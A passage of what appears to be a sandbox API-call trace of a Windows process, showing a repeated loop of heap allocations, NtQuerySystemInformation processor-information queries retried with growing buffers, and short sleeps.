RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0205.659] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.659] Sleep (dwMilliseconds=0x110) [0205.669] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0205.670] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.670] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.674] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0205.674] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.675] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.675] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0205.675] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.676] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.676] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0205.677] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0205.677] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.678] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0205.678] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.678] Sleep (dwMilliseconds=0x110) [0205.690] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0205.690] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.691] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.691] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0205.691] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.692] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.692] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0205.692] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.693] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.693] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0205.693] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0205.694] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.694] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0205.695] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.695] Sleep (dwMilliseconds=0x110) [0205.700] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0205.700] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.701] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.701] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0205.701] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.702] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.702] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0205.702] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.703] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.703] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0205.703] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0205.703] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.703] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0205.704] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.704] Sleep (dwMilliseconds=0x110) [0205.716] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0205.716] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.717] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.717] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0205.717] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.718] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.718] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0205.718] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.719] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.719] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0205.720] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0205.721] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.721] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0205.721] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.722] Sleep (dwMilliseconds=0x110) [0205.732] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0205.732] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.732] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.732] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0205.732] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.733] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.733] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0205.733] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.733] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.733] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0205.733] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0205.734] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.734] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0205.735] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.735] Sleep (dwMilliseconds=0x110) [0205.747] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0205.747] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.748] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.748] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0205.748] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.748] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.749] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0205.749] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.749] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.749] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0205.750] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0205.750] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.750] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0205.751] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.751] Sleep (dwMilliseconds=0x110) [0205.764] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0205.764] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.764] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.765] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0205.765] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.765] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.766] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0205.766] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.767] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.767] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0205.767] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0205.768] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.768] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0205.769] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.769] Sleep (dwMilliseconds=0x110) [0205.778] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0205.778] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.779] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.779] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0205.779] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.779] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.779] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0205.779] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.780] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.780] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0205.780] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0205.780] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.780] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0205.781] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.781] Sleep (dwMilliseconds=0x110) [0205.794] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0205.794] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.795] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.795] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0205.795] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.795] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.795] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0205.796] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.796] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.796] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0205.796] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0205.797] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.797] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0205.797] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.797] Sleep (dwMilliseconds=0x110) [0205.809] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0205.809] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.810] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.810] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0205.810] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.811] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.811] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0205.811] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.812] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.812] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0205.812] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0205.813] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.813] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0205.814] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.814] Sleep (dwMilliseconds=0x110) [0205.825] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0205.825] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.826] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.826] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0205.826] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.827] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.827] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0205.827] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.828] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.828] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0205.828] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0205.829] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.829] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0205.830] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.830] Sleep (dwMilliseconds=0x110) [0205.841] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0205.841] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.842] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.842] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0205.842] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.843] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.843] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0205.843] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.844] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.844] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0205.844] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0205.845] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.845] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0205.846] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.846] Sleep (dwMilliseconds=0x110) [0205.857] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0205.857] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.858] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.858] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0205.858] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.859] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.859] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0205.859] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.861] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.861] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0205.861] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0205.862] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.862] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0205.863] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.863] Sleep (dwMilliseconds=0x110) [0205.872] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0205.872] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.873] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.873] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0205.873] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.874] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.874] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0205.874] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.874] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.874] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0205.874] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, 